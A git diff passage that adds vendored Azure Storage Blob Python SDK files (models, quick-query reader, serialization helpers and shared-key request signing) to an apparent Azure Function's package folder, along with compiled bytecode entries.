specifying a different encryption scope than the scope + set on the container. Default value is false. + """ + + def __init__(self, default_encryption_scope, **kwargs): + self.default_encryption_scope = default_encryption_scope + self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', False) + + @classmethod + def _from_generated(cls, generated): + if generated.properties.default_encryption_scope: + scope = cls( + generated.properties.default_encryption_scope, + prevent_encryption_scope_override=generated.properties.prevent_encryption_scope_override or False + ) + return scope + return None + + +class DelimitedJsonDialect(DictMixin): + """Defines the input or output JSON serialization for a blob data query. + + :keyword str delimiter: The line separator character, default value is '\n' + """ + + def __init__(self, **kwargs): + self.delimiter = kwargs.pop('delimiter', '\n') + + +class DelimitedTextDialect(DictMixin): + """Defines the input or output delimited (CSV) serialization for a blob query request. + + :keyword str delimiter: + Column separator, defaults to ','. + :keyword str quotechar: + Field quote, defaults to '"'. + :keyword str lineterminator: + Record separator, defaults to '\\\\n'. + :keyword str escapechar: + Escape char, defaults to empty. + :keyword bool has_header: + Whether the blob data includes headers in the first line. The default value is False, meaning that the + data will be returned inclusive of the first line. If set to True, the data will be returned exclusive + of the first line. + """ + def __init__(self, **kwargs): + self.delimiter = kwargs.pop('delimiter', ',') + self.quotechar = kwargs.pop('quotechar', '"') + self.lineterminator = kwargs.pop('lineterminator', '\n') + self.escapechar = kwargs.pop('escapechar', "") + self.has_header = kwargs.pop('has_header', False) + + +class ArrowDialect(ArrowField): + """field of an arrow schema. + + All required parameters must be populated in order to send to Azure. + + :param ~azure.storage.blob.ArrowType type: Arrow field type. + :keyword str name: The name of the field. + :keyword int precision: The precision of the field. + :keyword int scale: The scale of the field. + """ + def __init__(self, type, **kwargs): # pylint: disable=redefined-builtin + super(ArrowDialect, self).__init__(type=type, **kwargs) + + +class ArrowType(str, Enum, metaclass=CaseInsensitiveEnumMeta): + + INT64 = "int64" + BOOL = "bool" + TIMESTAMP_MS = "timestamp[ms]" + STRING = "string" + DOUBLE = "double" + DECIMAL = 'decimal' + + +class ObjectReplicationPolicy(DictMixin): + """Policy id and rule ids applied to a blob. + + :ivar str policy_id: + Policy id for the blob. A replication policy gets created (policy id) when creating a source/destination pair. + :ivar list(~azure.storage.blob.ObjectReplicationRule) rules: + Within each policy there may be multiple replication rules. + e.g. rule 1= src/container/.pdf to dst/container2/; rule2 = src/container1/.jpg to dst/container3 + """ + + def __init__(self, **kwargs): + self.policy_id = kwargs.pop('policy_id', None) + self.rules = kwargs.pop('rules', None) + + +class ObjectReplicationRule(DictMixin): + """Policy id and rule ids applied to a blob. + + :ivar str rule_id: + Rule id. + :ivar str status: + The status of the rule. It could be "Complete" or "Failed" + """ + + def __init__(self, **kwargs): + self.rule_id = kwargs.pop('rule_id', None) + self.status = kwargs.pop('status', None) + + +class BlobQueryError(object): + """The error happened during quick query operation. + + :ivar str error: + The name of the error. + :ivar bool is_fatal: + If true, this error prevents further query processing. More result data may be returned, + but there is no guarantee that all of the original data will be processed. + If false, this error does not prevent further query processing. + :ivar str description: + A description of the error. + :ivar int position: + The blob offset at which the error occurred. + """ + def __init__(self, error=None, is_fatal=False, description=None, position=None): + self.error = error + self.is_fatal = is_fatal + self.description = description + self.position = position diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_quick_query_helper.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_quick_query_helper.py new file mode 100644 index 0000000..ab3772d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_quick_query_helper.py @@ -0,0 +1,195 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from io import BytesIO +from typing import Union, Iterable, IO # pylint: disable=unused-import + +from ._shared.avro.datafile import DataFileReader +from ._shared.avro.avro_io import DatumReader + + +class BlobQueryReader(object): # pylint: disable=too-many-instance-attributes + """A streaming object to read query results. + + :ivar str name: + The name of the blob being quered. + :ivar str container: + The name of the container where the blob is. + :ivar dict response_headers: + The response_headers of the quick query request. + :ivar bytes record_delimiter: + The delimiter used to separate lines, or records with the data. The `records` + method will return these lines via a generator. + """ + + def __init__( + self, + name=None, + container=None, + errors=None, + record_delimiter='\n', + encoding=None, + headers=None, + response=None, + error_cls=None, + ): + self.name = name + self.container = container + self.response_headers = headers + self.record_delimiter = record_delimiter + self._size = 0 + self._bytes_processed = 0 + self._errors = errors + self._encoding = encoding + self._parsed_results = DataFileReader(QuickQueryStreamer(response), DatumReader()) + self._first_result = self._process_record(next(self._parsed_results)) + self._error_cls = error_cls + + def __len__(self): + return self._size + + def _process_record(self, result): + self._size = result.get('totalBytes', self._size) + self._bytes_processed = result.get('bytesScanned', self._bytes_processed) + if 'data' in result: + return result.get('data') + if 'fatal' in result: + error = self._error_cls( + error=result['name'], + is_fatal=result['fatal'], + description=result['description'], + position=result['position'] + ) + if self._errors: + self._errors(error) + return None + + def _iter_stream(self): + if self._first_result is not None: + yield self._first_result + for next_result in self._parsed_results: + processed_result = self._process_record(next_result) + if processed_result is not None: + yield processed_result + + def readall(self): + # type: () -> Union[bytes, str] + """Return all query results. + + This operation is blocking until all data is downloaded. + If encoding has been configured - this will be used to decode individual + records are they are received. + + :rtype: Union[bytes, str] + """ + stream = BytesIO() + self.readinto(stream) + data = stream.getvalue() + if self._encoding: + return data.decode(self._encoding) + return data + + def readinto(self, stream): + # type: (IO) -> None + """Download the query result to a stream. + + :param stream: + The stream to download to. This can be an open file-handle, + or any writable stream. + :returns: None + """ + for record in self._iter_stream(): + stream.write(record) + + def records(self): + # type: () -> Iterable[Union[bytes, str]] + """Returns a record generator for the query result. + + Records will be returned line by line. + If encoding has been configured - this will be used to decode individual + records are they are received. + + :rtype: Iterable[Union[bytes, str]] + """ + delimiter = self.record_delimiter.encode('utf-8') + for record_chunk in self._iter_stream(): + for record in record_chunk.split(delimiter): + if self._encoding: + yield record.decode(self._encoding) + else: + yield record + + +class QuickQueryStreamer(object): + """ + File-like streaming iterator. + """ + + def __init__(self, generator): + self.generator = generator + self.iterator = iter(generator) + self._buf = b"" + self._point = 0 + self._download_offset = 0 + self._buf_start = 0 + self.file_length = None + + def __len__(self): + return self.file_length + + def __iter__(self): + return self.iterator + + @staticmethod + def seekable(): + return True + + def __next__(self): + next_part = next(self.iterator) + self._download_offset += len(next_part) + return next_part + + next = __next__ # Python 2 compatibility. + + def tell(self): + return self._point + + def seek(self, offset, whence=0): + if whence == 0: + self._point = offset + elif whence == 1: + self._point += offset + else: + raise ValueError("whence must be 0, or 1") + if self._point < 0: + self._point = 0 # XXX is this right? + + def read(self, size): + try: + # keep reading from the generator until the buffer of this stream has enough data to read + while self._point + size > self._download_offset: + self._buf += self.__next__() + except StopIteration: + self.file_length = self._download_offset + + start_point = self._point + + # EOF + self._point = min(self._point + size, self._download_offset) + + relative_start = start_point - self._buf_start + if relative_start < 0: + raise ValueError("Buffer has dumped too much data") + relative_end = relative_start + size + data = self._buf[relative_start: relative_end] + + # dump the extra data in buffer + # buffer start--------------------16bytes----current read position + dumped_size = max(relative_end - 16 - relative_start, 0) + self._buf_start += dumped_size + self._buf = self._buf[dumped_size:] + + return data diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_serialize.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_serialize.py new file mode 100644 index 0000000..4d938c2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_serialize.py @@ -0,0 +1,216 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use +from typing import ( # pylint: disable=unused-import + Any, Dict, Optional, Tuple, Union, + TYPE_CHECKING) + +try: + from urllib.parse import quote +except ImportError: + from urllib2 import quote # type: ignore + +from azure.core import MatchConditions + +from ._models import ( + ContainerEncryptionScope, + DelimitedJsonDialect) +from ._generated.models import ( + ModifiedAccessConditions, + SourceModifiedAccessConditions, + CpkScopeInfo, + ContainerCpkScopeInfo, + QueryFormat, + QuerySerialization, + DelimitedTextConfiguration, + JsonTextConfiguration, + ArrowConfiguration, + QueryFormatType, + BlobTag, + BlobTags, LeaseAccessConditions +) + +if TYPE_CHECKING: + from ._lease import BlobLeaseClient + + +_SUPPORTED_API_VERSIONS = [ + '2019-02-02', + '2019-07-07', + '2019-10-10', + '2019-12-12', + '2020-02-10', + '2020-04-08', + '2020-06-12', + '2020-08-04', + '2020-10-02', + '2020-12-06', + '2021-02-12', + '2021-04-10', + '2021-06-08' +] + + +def _get_match_headers(kwargs, match_param, etag_param): + # type: (Dict[str, Any], str, str) -> Tuple(Dict[str, Any], Optional[str], Optional[str]) + if_match = None + if_none_match = None + match_condition = kwargs.pop(match_param, None) + if match_condition == MatchConditions.IfNotModified: + if_match = kwargs.pop(etag_param, None) + if not if_match: + raise ValueError("'{}' specified without '{}'.".format(match_param, etag_param)) + elif match_condition == MatchConditions.IfPresent: + if_match = '*' + elif match_condition == MatchConditions.IfModified: + if_none_match = kwargs.pop(etag_param, None) + if not if_none_match: + raise ValueError("'{}' specified without '{}'.".format(match_param, etag_param)) + elif match_condition == MatchConditions.IfMissing: + if_none_match = '*' + elif match_condition is None: + if kwargs.get(etag_param): + raise ValueError("'{}' specified without '{}'.".format(etag_param, match_param)) + else: + raise TypeError("Invalid match condition: {}".format(match_condition)) + return if_match, if_none_match + + +def get_access_conditions(lease): + # type: (Optional[Union[BlobLeaseClient, str]]) -> Union[LeaseAccessConditions, None] + try: + lease_id = lease.id # type: ignore + except AttributeError: + lease_id = lease # type: ignore + return LeaseAccessConditions(lease_id=lease_id) if lease_id else None + + +def get_modify_conditions(kwargs): + # type: (Dict[str, Any]) -> ModifiedAccessConditions + if_match, if_none_match = _get_match_headers(kwargs, 'match_condition', 'etag') + return ModifiedAccessConditions( + if_modified_since=kwargs.pop('if_modified_since', None), + if_unmodified_since=kwargs.pop('if_unmodified_since', None), + if_match=if_match or kwargs.pop('if_match', None), + if_none_match=if_none_match or kwargs.pop('if_none_match', None), + if_tags=kwargs.pop('if_tags_match_condition', None) + ) + + +def get_source_conditions(kwargs): + # type: (Dict[str, Any]) -> SourceModifiedAccessConditions + if_match, if_none_match = _get_match_headers(kwargs, 'source_match_condition', 'source_etag') + return SourceModifiedAccessConditions( + source_if_modified_since=kwargs.pop('source_if_modified_since', None), + source_if_unmodified_since=kwargs.pop('source_if_unmodified_since', None), + source_if_match=if_match or kwargs.pop('source_if_match', None), + source_if_none_match=if_none_match or kwargs.pop('source_if_none_match', None), + source_if_tags=kwargs.pop('source_if_tags_match_condition', None) + ) + + +def get_cpk_scope_info(kwargs): + # type: (Dict[str, Any]) -> CpkScopeInfo + if 'encryption_scope' in kwargs: + return CpkScopeInfo(encryption_scope=kwargs.pop('encryption_scope')) + return None + + +def get_container_cpk_scope_info(kwargs): + # type: (Dict[str, Any]) -> ContainerCpkScopeInfo + encryption_scope = kwargs.pop('container_encryption_scope', None) + if encryption_scope: + if isinstance(encryption_scope, ContainerEncryptionScope): + return ContainerCpkScopeInfo( + default_encryption_scope=encryption_scope.default_encryption_scope, + prevent_encryption_scope_override=encryption_scope.prevent_encryption_scope_override + ) + if isinstance(encryption_scope, dict): + return ContainerCpkScopeInfo( + default_encryption_scope=encryption_scope['default_encryption_scope'], + prevent_encryption_scope_override=encryption_scope.get('prevent_encryption_scope_override') + ) + raise TypeError("Container encryption scope must be dict or type ContainerEncryptionScope.") + return None + + +def get_api_version(kwargs): + # type: (Dict[str, Any]) -> str + api_version = kwargs.get('api_version', None) + if api_version and api_version not in _SUPPORTED_API_VERSIONS: + versions = '\n'.join(_SUPPORTED_API_VERSIONS) + raise ValueError("Unsupported API version '{}'. Please select from:\n{}".format(api_version, versions)) + return api_version or _SUPPORTED_API_VERSIONS[-1] + + +def serialize_blob_tags_header(tags=None): + # type: (Optional[Dict[str, str]]) -> str + if tags is None: + return None + + components = list() + if tags: + for key, value in tags.items(): + components.append(quote(key, safe='.-')) + components.append('=') + components.append(quote(value, safe='.-')) + components.append('&') + + if components: + del components[-1] + + return ''.join(components) + + +def serialize_blob_tags(tags=None): + # type: (Optional[Dict[str, str]]) -> Union[BlobTags, None] + tag_list = list() + if tags: + tag_list = [BlobTag(key=k, value=v) for k, v in tags.items()] + return BlobTags(blob_tag_set=tag_list) + + +def serialize_query_format(formater): + if formater == "ParquetDialect": + qq_format = QueryFormat( + type=QueryFormatType.PARQUET, + parquet_text_configuration=' ' + ) + elif isinstance(formater, DelimitedJsonDialect): + serialization_settings = JsonTextConfiguration( + record_separator=formater.delimiter + ) + qq_format = QueryFormat( + type=QueryFormatType.json, + json_text_configuration=serialization_settings) + elif hasattr(formater, 'quotechar'): # This supports a csv.Dialect as well + try: + headers = formater.has_header + except AttributeError: + headers = False + serialization_settings = DelimitedTextConfiguration( + column_separator=formater.delimiter, + field_quote=formater.quotechar, + record_separator=formater.lineterminator, + escape_char=formater.escapechar, + headers_present=headers + ) + qq_format = QueryFormat( + type=QueryFormatType.delimited, + delimited_text_configuration=serialization_settings + ) + elif isinstance(formater, list): + serialization_settings = ArrowConfiguration( + schema=formater + ) + qq_format = QueryFormat( + type=QueryFormatType.arrow, + arrow_configuration=serialization_settings) + elif not formater: + return None + else: + raise TypeError("Format must be DelimitedTextDialect or DelimitedJsonDialect or ParquetDialect.") + return QuerySerialization(format=qq_format) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__init__.py new file mode 100644 index 0000000..473943d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__init__.py @@ -0,0 +1,56 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import base64 +import hashlib +import hmac + +try: + from urllib.parse import quote, unquote +except ImportError: + from urllib2 import quote, unquote # type: ignore + +import six + + +def url_quote(url): + return quote(url) + + +def url_unquote(url): + return unquote(url) + + +def encode_base64(data): + if isinstance(data, six.text_type): + data = data.encode('utf-8') + encoded = base64.b64encode(data) + return encoded.decode('utf-8') + + +def decode_base64_to_bytes(data): + if isinstance(data, six.text_type): + data = data.encode('utf-8') + return base64.b64decode(data) + + +def decode_base64_to_text(data): + decoded_bytes = decode_base64_to_bytes(data) + return decoded_bytes.decode('utf-8') + + +def sign_string(key, string_to_sign, key_is_base64=True): + if key_is_base64: + key = decode_base64_to_bytes(key) + else: + if isinstance(key, six.text_type): + key = key.encode('utf-8') + if isinstance(string_to_sign, six.text_type): + string_to_sign = string_to_sign.encode('utf-8') + signed_hmac_sha256 = hmac.HMAC(key, string_to_sign, hashlib.sha256) + digest = signed_hmac_sha256.digest() + encoded_digest = encode_base64(digest) + return encoded_digest diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d5390b2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/authentication.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/authentication.cpython-39.pyc new file mode 100644 index 0000000..ec8789a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/authentication.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client.cpython-39.pyc new file mode 100644 index 0000000..8d83626 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client_async.cpython-39.pyc new file mode 100644 index 0000000..750db1e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/constants.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/constants.cpython-39.pyc new file mode 100644 index 0000000..f1d044e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/constants.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/encryption.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/encryption.cpython-39.pyc new file mode 100644 index 0000000..6501dd9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/encryption.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/models.cpython-39.pyc new file mode 100644 index 0000000..cebc625 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/parser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/parser.cpython-39.pyc new file mode 100644 index 0000000..641a116 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/parser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies.cpython-39.pyc new file mode 100644 index 0000000..46350fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies_async.cpython-39.pyc new file mode 100644 index 0000000..b682a2d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/request_handlers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/request_handlers.cpython-39.pyc new file mode 100644 index 0000000..a2bb396 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/request_handlers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/response_handlers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/response_handlers.cpython-39.pyc new file mode 100644 index 0000000..a9babe3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/response_handlers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/shared_access_signature.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/shared_access_signature.cpython-39.pyc new file mode 100644 index 0000000..b7baac9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/shared_access_signature.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads.cpython-39.pyc new file mode 100644 index 0000000..75e9213 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads_async.cpython-39.pyc new file mode 100644 index 0000000..2156ba5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/authentication.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/authentication.py new file mode 100644 index 0000000..292cdaa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/authentication.py @@ -0,0 +1,178 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import logging +import re +import sys + +try: + from urllib.parse import urlparse, unquote +except ImportError: + from urlparse import urlparse # type: ignore + from urllib2 import unquote # type: ignore + +try: + from yarl import URL +except ImportError: + pass + +try: + from azure.core.pipeline.transport import AioHttpTransport +except ImportError: + AioHttpTransport = None + +from azure.core.exceptions import ClientAuthenticationError +from azure.core.pipeline.policies import SansIOHTTPPolicy + +from . import sign_string + + +logger = logging.getLogger(__name__) + + + +# wraps a given exception with the desired exception type +def _wrap_exception(ex, desired_type): + msg = "" + if ex.args: + msg = ex.args[0] + if sys.version_info >= (3,): + # Automatic chaining in Python 3 means we keep the trace + return desired_type(msg) + # There isn't a good solution in 2 for keeping the stack trace + # in general, or that will not result in an error in 3 + # However, we can keep the previous error type and message + # TODO: In the future we will log the trace + return desired_type('{}: {}'.format(ex.__class__.__name__, msg)) + + +class AzureSigningError(ClientAuthenticationError): + """ + Represents a fatal error when attempting to sign a request. + In general, the cause of this exception is user error. For example, the given account key is not valid. + Please visit https://docs.microsoft.com/en-us/azure/storage/common/storage-create-storage-account for more info. + """ + + +# pylint: disable=no-self-use +class SharedKeyCredentialPolicy(SansIOHTTPPolicy): + + def __init__(self, account_name, account_key): + self.account_name = account_name + self.account_key = account_key + super(SharedKeyCredentialPolicy, self).__init__() + + @staticmethod + def _get_headers(request, headers_to_sign): + headers = dict((name.lower(), value) for name, value in request.http_request.headers.items() if value) + if 'content-length' in headers and headers['content-length'] == '0': + del headers['content-length'] + return '\n'.join(headers.get(x, '') for x in headers_to_sign) + '\n' + + @staticmethod + def _get_verb(request): + return request.http_request.method + '\n' + + def _get_canonicalized_resource(self, request): + uri_path = urlparse(request.http_request.url).path + try: + if isinstance(request.context.transport, AioHttpTransport) or \ + isinstance(getattr(request.context.transport, "_transport", None), AioHttpTransport) or \ + isinstance(getattr(getattr(request.context.transport, "_transport", None), "_transport", None), + AioHttpTransport): + uri_path = URL(uri_path) + return '/' + self.account_name + str(uri_path) + except TypeError: + pass + return '/' + self.account_name + uri_path + + @staticmethod + def _get_canonicalized_headers(request): + string_to_sign = '' + x_ms_headers = [] + for name, value in request.http_request.headers.items(): + if name.startswith('x-ms-'): + x_ms_headers.append((name.lower(), value)) + x_ms_headers.sort() + for name, value in x_ms_headers: + if value is not None: + string_to_sign += ''.join([name, ':', value, '\n']) + return string_to_sign + + @staticmethod + def _get_canonicalized_resource_query(request): + sorted_queries = list(request.http_request.query.items()) + sorted_queries.sort() + + string_to_sign = '' + for name, value in sorted_queries: + if value is not None: + string_to_sign += '\n' + name.lower() + ':' + unquote(value) + + return string_to_sign + + def _add_authorization_header(self, request, string_to_sign): + try: + signature = sign_string(self.account_key, string_to_sign) + auth_string = 'SharedKey ' + self.account_name + ':' + signature + request.http_request.headers['Authorization'] = auth_string + except Exception as ex: + # Wrap any error that occurred as signing error + # Doing so will clarify/locate the source of problem + raise _wrap_exception(ex, AzureSigningError) + + def on_request(self, request): + string_to_sign = \ + self._get_verb(request) + \ + self._get_headers( + request, + [ + 'content-encoding', 'content-language', 'content-length', + 'content-md5', 'content-type', 'date', 'if-modified-since', + 'if-match', 'if-none-match', 'if-unmodified-since', 'byte_range' + ] + ) + \ + self._get_canonicalized_headers(request) + \ + self._get_canonicalized_resource(request) + \ + self._get_canonicalized_resource_query(request) + + self._add_authorization_header(request, string_to_sign) + #logger.debug("String_to_sign=%s", string_to_sign) + + +class StorageHttpChallenge(object): + def __init__(self, challenge): + """ Parses an HTTP WWW-Authentication Bearer challenge from the Storage service. """ + if not challenge: + raise ValueError("Challenge cannot be empty") + + self._parameters = {} + self.scheme, trimmed_challenge = challenge.strip().split(" ", 1) + + # name=value pairs either comma or space separated with values possibly being + # enclosed in quotes + for item in re.split('[, ]', trimmed_challenge): + comps = item.split("=") + if len(comps) == 2: + key = comps[0].strip(' "') + value = comps[1].strip(' "') + if key: + self._parameters[key] = value + + # Extract and verify required parameters + self.authorization_uri = self._parameters.get('authorization_uri') + if not self.authorization_uri: + raise ValueError("Authorization Uri not found") + + self.resource_id = self._parameters.get('resource_id') + if not self.resource_id: + raise ValueError("Resource id not found") + + uri_path = urlparse(self.authorization_uri).path.lstrip("/") + self.tenant_id = uri_path.split("/")[0] + + def get_value(self, key): + return self._parameters.get(key) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__init__.py new file mode 100644 index 0000000..fb40d51 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__init__.py @@ -0,0 +1,5 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..145badc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io.cpython-39.pyc new file mode 100644 index 0000000..1bb991b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io_async.cpython-39.pyc new file mode 100644 index 0000000..cbec54a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile.cpython-39.pyc new file mode 100644 index 0000000..fb8696e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile_async.cpython-39.pyc new file mode 100644 index 0000000..5aa881e Binary files /dev/null and 